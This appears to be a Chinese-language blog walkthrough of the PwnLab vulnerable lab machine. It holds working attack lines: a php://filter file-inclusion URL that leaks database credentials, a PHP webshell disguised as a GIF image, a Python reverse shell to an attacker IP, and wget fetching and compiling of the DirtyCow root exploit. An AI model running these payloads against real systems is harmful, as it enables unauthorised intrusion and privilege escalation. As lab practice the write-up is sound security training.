Pwnlab

Posted by on 2020年3月9日


Pwnlab

下载地址

arp-scan -l

file

zenmap扫描端口

file

访问80端口

file

dirb扫描目录

file

nikto扫描发现了config.php

file

参考:Interesting Local File Inclusion method

1.访问:http://192.168.60.134/?page=php://filter/convert.base64-encode/resource=index
使用burp base64解码密文获得:

file

2.访问:http://192.168.60.134/?page=php://filter/convert.base64-encode/resource=config
获得:

<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

3.访问:http://192.168.60.134/?page=php://filter/convert.base64-encode/resource=upload

file

连接config中的mysql

mysql -h 192.168.60.134 -u root -p

file

解密
账号:kent
密码:JWzXuBJJNy

upload页面中根据源码:
定义的白名单为扩展名为jpg,jpeg,gif和png的文件,代码还定义了可接受的mime类型。如果没有匹配,我们将得到错误2(上面已经得到)。
此外,该文件不能具有多个扩展名。

创建php shell,上传成功

gedit 1.png
    GIF89a;
    <?php
        system($_REQUEST['cmd']);
    ?>

file

尝试执行whoami命令

file

反弹www shell

nc -vlp 4444
?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.60.131",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty;pty.spawn("/bin/bash")'

file
file

账号:kent
密码:JWzXuBJJNy

su kent
uname -a

file

访问:https://raw.githubusercontent.com/exrienz/DirtyCow/master/dc32.c

kali机:

gedit dc.c
    https://raw.githubusercontent.com/exrienz/DirtyCow/master/dc32.c
python -m SimpleHTTPServer 80

靶机:

cd /tmp
wget http://192.168.60.131/dc.c
gcc dc.c -o cowroot -pthread
./cowroot

file

get flag.txt

file




发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据